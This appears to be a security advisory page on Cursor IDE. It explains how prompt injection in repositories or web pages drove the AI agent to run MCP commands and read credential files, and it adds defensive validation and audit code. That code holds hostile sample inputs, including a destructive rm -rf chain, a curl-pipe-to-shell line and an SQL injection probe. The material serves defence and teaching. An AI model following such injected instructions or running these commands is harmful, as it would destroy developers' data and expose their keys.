Cursor Security Incidents
A timeline of security incidents, CVEs, and vulnerability patterns affecting Cursor IDE users, including MCP server exploits, privacy mode limitations, and AI-generated code risks.
Known CVEs
CVE-2025-54135 — MCP Server Command Injection
A command injection vulnerability in Cursor's MCP server implementation allowed attackers to execute arbitrary shell commands on the developer's machine. Through prompt injection attacks — hidden instructions in web pages, repositories, or documentation — an attacker could trick Cursor's AI agent into executing malicious terminal commands via the MCP tool interface.
Attack Vector
An attacker places hidden instructions in a repository README, code comment, or web page. When a Cursor user asks the AI to analyze or work with this content, the prompt injection triggers the AI to call MCP tools with malicious parameters, executing arbitrary commands.
CVE-2025-54136 — MCP Server Path Traversal
A path traversal vulnerability in Cursor's MCP implementation allowed reading and writing files outside the intended project directory. Through the same prompt injection vector, an attacker could instruct the AI to read sensitive files like SSH keys, environment variables, and cloud credentials from anywhere on the file system.
Potential Data Exfiltration
- SSH private keys (~/.ssh/id_rsa)
- Cloud provider credentials (~/.aws/credentials)
- Environment files with database passwords (.env)
- Browser cookies and stored passwords
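Both CVEs above come down to the same defensive question: what checks does an MCP tool apply to the parameters the model hands it before touching the file system or the shell? The following is an added example, not Cursor's code or the code of any MCP server, showing the two guards a tool implementer would want: a path check that canonicalises the requested path and rejects anything that resolves outside the project root (the path traversal case), and a command check that parses the command line into argv, requires the executable to be on an allowlist, refuses shell metacharacters, and never hands the string to a shell (the command injection case). The project root, the allowlist and the sample inputs are constructed for the example.

```python
import shlex
import subprocess
from pathlib import Path

# Constructed example: the only directory the MCP tools may read or write.
PROJECT_ROOT = Path("/home/dev/project")

# Hypothetical allowlist of executables the "run command" tool may start.
ALLOWED_COMMANDS = {"git", "npm", "pytest", "ls"}

# Characters that only mean something to a shell. Because we never invoke a
# shell they could not expand anyway, but an argument carrying them is almost
# always an injection attempt, so reject it outright.
SHELL_META = set(";&|<>`$\n")


def resolve_inside_root(requested: str, root: Path = PROJECT_ROOT) -> Path:
    """Return the canonical path for `requested` if it lies inside `root`.

    Joining then resolving collapses `..` segments and follows symlinks, so
    `src/../../.ssh/id_rsa`, an absolute path such as `/etc/passwd`, or a
    symlink pointing out of the tree all end up outside `root` and are
    rejected. strict=False keeps this usable for files about to be created.
    """
    root = root.resolve()
    candidate = (root / requested).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes project root: {requested!r}")
    return candidate


def is_path_allowed(requested: str) -> bool:
    try:
        resolve_inside_root(requested)
        return True
    except PermissionError:
        return False


def build_argv(command_line: str) -> list[str]:
    """Turn a tool-supplied command line into argv for subprocess (no shell)."""
    try:
        argv = shlex.split(command_line)
    except ValueError as exc:              # unbalanced quotes etc.
        raise PermissionError(f"unparseable command: {exc}") from exc
    if not argv:
        raise PermissionError("empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"executable not allowlisted: {argv[0]!r}")
    for token in argv:
        if SHELL_META & set(token):
            raise PermissionError(f"shell metacharacter in argument: {token!r}")
    return argv


def is_command_allowed(command_line: str) -> bool:
    try:
        build_argv(command_line)
        return True
    except PermissionError:
        return False


def run_tool_command(command_line: str) -> subprocess.CompletedProcess:
    """Execute an allowlisted command with argv semantics, inside the root."""
    argv = build_argv(command_line)
    # shell=False is the default; stated explicitly because it is the point.
    return subprocess.run(argv, shell=False, cwd=PROJECT_ROOT,
                          capture_output=True, text=True, timeout=60)


if __name__ == "__main__":
    for p in ["src/main.py", "../.ssh/id_rsa", "/home/dev/.aws/credentials"]:
        print(f"path {p!r:40} allowed={is_path_allowed(p)}")
    for c in ["git status", "git status; rm -rf ~", "curl http://example.invalid | sh"]:
        print(f"cmd  {c!r:40} allowed={is_command_allowed(c)}")
```

The allowlist is deliberately a set of bare executable names: matching on the first token after `shlex.split` means `"git status; rm -rf ~"` is rejected because of the `;`, not because a regex happened to catch `rm`. Rejecting on metacharacters rather than trying to sanitise them is the cheaper and safer choice for a tool whose inputs come from a model.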
Additional Security Concerns
Privacy Mode Limitations
Cursor offers a privacy mode that prevents code from being stored on Cursor's servers or used for model training. However, code is still transmitted to AI providers (OpenAI, Anthropic) for real-time processing. Privacy mode controls data retention, not data transmission. For organizations with strict data sovereignty requirements, this distinction is critical.
What Privacy Mode Does
- Prevents code storage on Cursor servers
- Opts out of training data collection
- Disables telemetry on code content
What It Does Not Do
- Does not prevent real-time code transmission to AI providers
- Does not protect against MCP vulnerabilities
- Does not validate security of AI-generated code
MCP Server Supply Chain Risks
Cursor's MCP server ecosystem allows third-party tool integrations that extend AI capabilities. These servers run with the user's system permissions: they can read and write files, reach the network, and execute commands. Malicious or compromised MCP servers represent a significant supply chain attack vector.
Risk Factors
- No centralized MCP server registry with security auditing
- MCP servers run with the same permissions as the user
- No sandboxing between MCP servers and the host system
- Updates to MCP servers can introduce malicious code
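Two of the risk factors above (servers fetched at launch with no audit, updates that silently change what runs) are visible in the MCP configuration itself. The following is an added example, not part of the page or of Cursor, of a small audit script for that file. It assumes the `.cursor/mcp.json` layout of a top-level `"mcpServers"` map whose entries carry `command`, `args` and an optional `env`, and flags three things: packages launched through `npx`/`uvx` without a pinned version (every launch pulls whatever is latest), absolute paths handed to a server that lie outside the project root, and secret-looking environment values stored as plaintext in the config. The sample config, package names and token value are constructed.

```python
import json
import re

# Constructed sample of a .cursor/mcp.json. The "mcpServers" map shape is an
# assumption about the client's config format; package names are invented.
SAMPLE_MCP_JSON = """
{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@example/fs-server", "/home/dev"]
    },
    "github": {
      "command": "npx",
      "args": ["-y", "@example/github-server@1.4.2"],
      "env": {"GITHUB_PERSONAL_ACCESS_TOKEN": "ghp_constructedExampleValue000"}
    },
    "local-tool": {
      "command": "python",
      "args": ["/home/dev/tools/mcp_server.py"]
    }
  }
}
"""

# Launchers that download and run a package on every start.
PACKAGE_RUNNERS = {"npx", "uvx"}
SECRET_KEY_RE = re.compile(r"TOKEN|SECRET|PASSWORD|API_KEY|PRIVATE", re.I)


def package_version(spec: str):
    """'@scope/name@1.2.3' -> '1.2.3'; 'name@0.3.0' -> '0.3.0'; unpinned -> None."""
    body = spec[1:] if spec.startswith("@") else spec   # skip the scope's '@'
    return body.rsplit("@", 1)[1] if "@" in body else None


def inside_root(path: str, root: str) -> bool:
    # Prefix comparison with a trailing slash so /home/dev does not match
    # /home/devops-root; both arguments are expected to be absolute.
    return (path.rstrip("/") + "/").startswith(root.rstrip("/") + "/")


def audit_mcp_config(text: str, project_root: str) -> list[dict]:
    findings = []
    servers = json.loads(text).get("mcpServers", {})
    for name, spec in servers.items():
        command = spec.get("command", "")
        args = list(spec.get("args", []))

        if command in PACKAGE_RUNNERS:
            # First non-flag argument is the package the runner will fetch.
            pkg = next((a for a in args if not a.startswith("-")), None)
            if pkg is not None:
                if package_version(pkg) is None:
                    auto = " with -y (no install prompt)" if "-y" in args else ""
                    findings.append({"server": name, "severity": "high",
                                     "issue": f"unpinned package {pkg!r}{auto}: "
                                              "each launch runs the latest published version"})
                # Arguments after the package name are the server's own; an
                # absolute path there is typically the directory it is granted.
                for arg in args[args.index(pkg) + 1:]:
                    if arg.startswith("/") and not inside_root(arg, project_root):
                        findings.append({"server": name, "severity": "medium",
                                         "issue": f"server granted {arg!r}, outside project root"})

        for key, value in spec.get("env", {}).items():
            if SECRET_KEY_RE.search(key) and value:
                findings.append({"server": name, "severity": "high",
                                 "issue": f"secret {key} stored as plaintext in config"})
    return findings


if __name__ == "__main__":
    for f in audit_mcp_config(SAMPLE_MCP_JSON, "/home/dev/project"):
        print(f"[{f['severity']}] {f['server']}: {f['issue']}")
```

Pinning a version does not make a package trustworthy, but it turns "whatever was published last night" into a reviewable artifact, which is what the audit step in the hardening list below needs. The secret check is intentionally coarse: any literal value under a key that looks like a credential is reported, and how to supply it instead (process environment, OS keychain, a secret manager) depends on what the client supports.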
AI-Generated Code Vulnerabilities
Like all AI coding assistants, Cursor generates code that may contain security vulnerabilities. Common patterns include missing input validation, insecure authentication implementations, SQL injection through string concatenation, and hardcoded secrets. The risk is amplified by Cursor's agent mode, which can generate and execute multi-file changes with minimal review.
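To make two of the patterns above concrete for reviewers, here is an added example (not code from the page or from Cursor) that puts the string-concatenated query next to its parameterised replacement and shows, against a constructed in-memory SQLite table, why the first returns every row for a crafted username while the second treats the same input as an ordinary value. It also shows the hardcoded-secret pattern beside a loader that reads the key from the environment. Table contents, the `APP_API_KEY` variable name and the inputs are constructed.

```python
import os
import sqlite3
from typing import Mapping, Optional


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for an application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # The pattern the page warns about: the caller's string becomes part of
    # the SQL text, so a quote character in it changes the query's structure.
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_hardened(conn: sqlite3.Connection, username: str) -> list:
    # Parameterised query: the value travels separately from the SQL text and
    # is never parsed as SQL, whatever characters it contains.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Hardcoded-secret pattern, as generated code often looks:
# API_KEY = "sk-live-constructed-example"
# Hardened form: the secret lives outside the source tree and is read at start.
def load_api_key(env: Optional[Mapping[str, str]] = None) -> Optional[str]:
    """Return APP_API_KEY from the given mapping (default: the process environment).

    Returns None when absent so the caller can fail fast at startup instead of
    discovering the missing key on the first request.
    """
    source = os.environ if env is None else env
    return source.get("APP_API_KEY") or None


if __name__ == "__main__":
    probe = "' OR '1'='1"     # constructed input that a reviewer would try
    print("vulnerable:", find_user_vulnerable(make_db(), probe))   # all three rows
    print("hardened:  ", find_user_hardened(make_db(), probe))     # no rows
    print("api key present:", load_api_key() is not None)
```

When reviewing agent-generated database code, the thing to look for is any query built with `+`, `%`, `.format()` or an f-string from a value that originated outside the function; the parameterised form is the same length and the driver does the quoting.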
Securing Your Cursor Workflow
Keep Cursor Updated
Security patches for MCP vulnerabilities are delivered through Cursor updates. Always run the latest version.
Audit MCP Servers
Only install MCP servers from trusted sources. Review their code and permissions before enabling them. Remove unused MCP servers.
Review AI-Generated Code
Never accept multi-file agent changes without reviewing each file. Pay special attention to authentication, database queries, and API key handling.
Use Approval Mode for Terminal Commands
Configure Cursor to require explicit approval before executing terminal commands. Never allow auto-execution of shell commands.
Isolate Development Environments
Run Cursor in containers or VMs without access to production credentials, SSH keys, or cloud provider configurations.
Scan Before Deploying
Use security scanning tools to audit code generated by Cursor before pushing to production.
Secure Your Cursor-Built Applications
AI-generated code from Cursor needs security validation before deployment. Scan your application for vulnerabilities, exposed secrets, and authentication gaps.
Frequently Asked Questions
What CVEs affect Cursor IDE?
Cursor has been affected by CVE-2025-54135 (MCP server command injection) and CVE-2025-54136 (MCP server path traversal). These vulnerabilities allow attackers to execute arbitrary commands and access files outside the project directory through prompt injection attacks.
Does Cursor privacy mode fully protect my code?
Cursor's privacy mode prevents code from being stored or used for training, but code is still sent to AI providers for processing. Privacy mode controls data retention, not real-time processing. It does not prevent MCP vulnerabilities or protect against AI-generated code issues.
Are Cursor MCP servers safe to use?
MCP servers expand AI capabilities but introduce supply chain risks. Only install MCP servers from trusted sources, review their permissions, and keep them updated. The MCP protocol has no built-in authentication, making tool calls susceptible to prompt injection.
Last updated: February 2026